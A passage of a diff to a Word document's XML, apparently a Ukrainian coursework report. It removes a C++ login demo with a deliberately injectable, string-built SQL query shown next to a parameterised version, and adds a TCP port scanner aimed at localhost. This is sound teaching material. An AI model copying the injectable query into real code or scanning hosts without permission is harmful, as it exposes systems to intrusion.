+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">const char* serviceName(int port) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    for (const ServiceName&amp; service : KNOWN_SERVICES) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        if (service.port == port) return service.name;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return "Unknown";</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4250,103 +3698,370 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">// ВРАЗЛИВИЙ варіант: запит склеюється з рядків, дані користувача</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">// потрапляють у текст запиту й змінюють його структуру</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">bool vulnerableLogin(sqlite3* db, const std::string&amp; login,</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">                     const std::string&amp; password) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::string query = "SELECT login, role FROM users WHERE login='" + login +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">                        "' AND password='" + password + "'";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    if (sqlite3_prepare_v2(db, query.c_str(), -1, &amp;stmt, nullptr) != SQLITE_OK) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Помилка SQL: " &lt;&lt; sqlite3_errmsg(db) &lt;&lt; "\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        return false;</w:t>
+              <w:t xml:space="preserve">// Спроба встановити з'єднання: успіх означає, що порт відкритий</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">bool isPortOpen(const std::string&amp; host, int port, int timeoutMs = 500) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    socket_t sock = socket(AF_INET, SOCK_STREAM, 0);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (sock == INVALID_SOCK) return false;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // Обмежуємо час очікування. На Linux connect() зважає на SO_SNDTIMEO;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // Windows цей параметр для connect() ігнорує, і там надійний тайм-аут</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // потребує неблокувального сокета й select(). Для 127.0.0.1 це не</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // важливо: закритий порт відповідає відмовою (RST) миттєво</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    DWORD timeout = static_cast&lt;DWORD&gt;(timeoutMs);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">               reinterpret_cast&lt;const char*&gt;(&amp;timeout), sizeof(timeout));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#else</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    timeval timeout{ timeoutMs / 1000, (timeoutMs % 1000) * 1000 };</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, &amp;timeout, sizeof(timeout));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sockaddr_in address{};</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    address.sin_family = AF_INET;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    address.sin_port = htons(static_cast&lt;unsigned short&gt;(port));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    inet_pton(AF_INET, host.c_str(), &amp;address.sin_addr);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool opened =</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address)) == 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    closesocket(sock);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return opened;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">int main() {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // УВАГА: сканувати дозволено лише власний комп'ютер або вузол,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // на який є письмовий дозвіл власника</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const std::string target = "127.0.0.1";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const std::vector&lt;int&gt; ports = {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        21, 22, 23, 25, 53, 80, 110, 135, 139, 143,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        443, 445, 993, 995, 1433, 3306, 3389, 5432, 8080</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    };</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    WSADATA wsa;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (WSAStartup(MAKEWORD(2, 2), &amp;wsa) != 0) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cerr &lt;&lt; "Не вдалося ініціалізувати Winsock\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        return 1;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4363,50 +4078,92 @@
               <w:pStyle w:val="SourceCode"/>
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    if (found) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Вхід виконано як: "</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; " (роль "</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 1) &lt;&lt; ")\n";</w:t>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Сканування " &lt;&lt; target &lt;&lt; "...\n\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Відкриті порти:\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    int found = 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    for (int port : ports) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        if (isPortOpen(target, port)) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            std::cout &lt;&lt; "  " &lt;&lt; port &lt;&lt; "/tcp - " &lt;&lt; serviceName(port) &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            ++found;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        }</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4423,170 +4180,23 @@
               <w:pStyle w:val="SourceCode"/>
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    return found;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">// БЕЗПЕЧНИЙ варіант: структура запиту фіксована, дані передаються</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">// окремо через параметри й ніколи не тлумачаться як код SQL</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">bool safeLogin(sqlite3* db, const std::string&amp; login, const std::string&amp; password) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    const char* query = "SELECT login, role FROM users WHERE login=? AND password=?";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Параметри: ('" &lt;&lt; login &lt;&lt; "', '" &lt;&lt; password &lt;&lt; "')\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3_prepare_v2(db, query, -1, &amp;stmt, nullptr);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 1, login.c_str(), -1, SQLITE_TRANSIENT);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 2, password.c_str(), -1, SQLITE_TRANSIENT);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    if (found) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Вхід виконано як: "</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; "\n";</w:t>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (found == 0) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "  (жодного з перевірених портів не відкрито)\n";</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4603,191 +4213,32 @@
               <w:pStyle w:val="SourceCode"/>
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
